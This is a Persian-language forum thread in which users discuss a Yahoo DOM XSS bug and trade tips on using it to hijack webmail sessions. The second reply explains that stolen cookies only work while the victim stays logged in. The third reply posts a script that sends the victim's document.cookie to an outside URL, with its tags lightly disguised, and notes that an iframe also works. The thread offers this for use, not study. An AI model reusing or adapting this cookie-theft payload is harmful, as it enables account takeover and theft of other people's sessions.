اطلاعیه

Collapse
No announcement yet.

yahoo dom xss

Collapse
X
 
  • Filter
  • زمان
  • Show
Clear All
new posts

  • yahoo dom xss

    سلام.

    این باگ پارسال تو یاهو پیدا شد. نمیدونم الان فیکس شده یا نه.

    فیلم

    اگه کسی فایل html رو داره قرار بده
    من و تو ان دو خطیم آری موازیان به ناچاری

    که هر دو باورمان زاغاز به همدگر نرسیدن بود

    چه سرنوشت غم انگیزی یست که کرم کوچک ابریشم

    تمام عمر قفس میبافت ولی به فکر پریدن بود (مرحوم حسین منزوری)


    از این دنیای بی احساس یه روز حقمو میگیرم !


    [CENTER]

  • #2
    البته پارسال هم به این صورت بود که طرفی که کوکیهاش hijack میشه اگه از میلش خارج بشه و دوباره لوگین کنه اون لحظه باز کسی نمیتونه با داشتن کوکیهای طرف لوگین کنه به تارگت فقط باید تارگت انلاین باشه به میل همون لحظه هم کوکیهاشو رو خودت ست کنی یک بار از میل بیاد بیرون کوکیها بدرد نمیخوره

    Comment


    • #3
      yahoo dom xss

      سلام
      فکر کنم این کد تو فایل html باشه.
      کد:
      <scrip.t>
      document.location='http://site.com/yahoo.php?ex='.concat(escape(document.c00kie));
      </scrip.t>
      میشه از iframe هم استفاده کرد.
      باگ پتچ شده.

      scrip.t و c00kie هم حواست باشه بهش !
      فایل های پیوست شده
      Last edited by hoor4m; 01-11-2014, 05:36 AM.

      Comment

      Working...
      X